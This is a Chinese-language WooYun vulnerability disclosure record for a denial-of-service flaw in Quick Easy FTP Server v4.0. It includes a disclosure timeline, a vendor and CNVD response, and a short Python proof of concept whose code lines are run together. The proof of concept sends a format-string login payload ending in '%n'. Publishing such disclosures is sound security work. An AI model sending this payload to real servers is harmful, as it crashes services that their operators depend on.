{"id": 39420, "wybug_id": "wooyun-2015-094077", "wybug_title": "Quick Easy FTP Server 拒绝服务", "wybug_corp": "Quick Easy FTP Server", "wybug_author": "路人甲", "wybug_date": "2015-02-02 10:31", "wybug_open_date": "2015-05-07 09:48", "wybug_type": "拒绝服务", "wybug_level": "低", "wybug_rank_0": "1", "wybug_status": "已交由第三方合作机构(cncert国家互联网应急中心)处理", "wybug_from": "http://www.wooyun.org", "wybug_tags": ["拒绝服务"], "wybug_detail": "漏洞详情 披露状态：   \t\t\t\t\t\t\t\t\t2015-02-02：\t细节已通知厂商并且等待厂商处理中\t\t\t\t\t\t\t\t\t2015-02-06：\t厂商已经确认，细节仅向厂商公开\t\t\t\t\t\t\t\t\t2015-02-09：\t细节向第三方安全合作伙伴开放\t\t\t\t\t\t\t\t\t2015-04-02：\t细节向核心白帽子及相关领域专家公开\t\t\t\t\t\t\t\t\t2015-04-12：\t细节向普通白帽子公开\t\t\t\t\t\t\t\t\t2015-04-22：\t细节向实习白帽子公开\t\t\t\t\t\t\t\t\t2015-05-07：\t细节向公众公开  简要描述： Quick Easy FTP Server v4.0版本存在一个远程拒绝服务,由于无法控制eip所以危害较小. 详细说明：  在wdxp中对%n字符引起的本地拒绝服务   漏洞证明：  漏洞证明比较纠结请看下面poc\n#! /usr/bin/python# utf8 -- codingfrom ftplib import FTPftp = FTP()ftp.connect('172.16.15.109','21')ftp.login(\"XPWD AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%n\",\"null\")ftp.quir()\n   修复方案：  :)   版权声明：转载请注明来源 路人甲@乌云\n ", "wybug_reply": "漏洞回应  厂商回应： 危害等级：中 漏洞Rank：8  确认时间：2015-02-06 09:47 厂商回复： CNVD确认所述漏洞情况，暂未建立与软件生产厂商（或网站管理单位）的直接处置渠道，待认领。 最新状态： 暂无  ", "replys": "漏洞评价：\n评论\n     2015-02-26 10:08 |    \t\t光刃 \t\t\t( 普通白帽子  |\t\t\t        Rank:200 漏洞数:24        | 萝卜白菜保平安)\t\t \n  嗯，不错~    \n  \n\n\n", "wybug_level_fromcorp": "中", "wybug_rank_fromcorp": 8, "Ranks": null}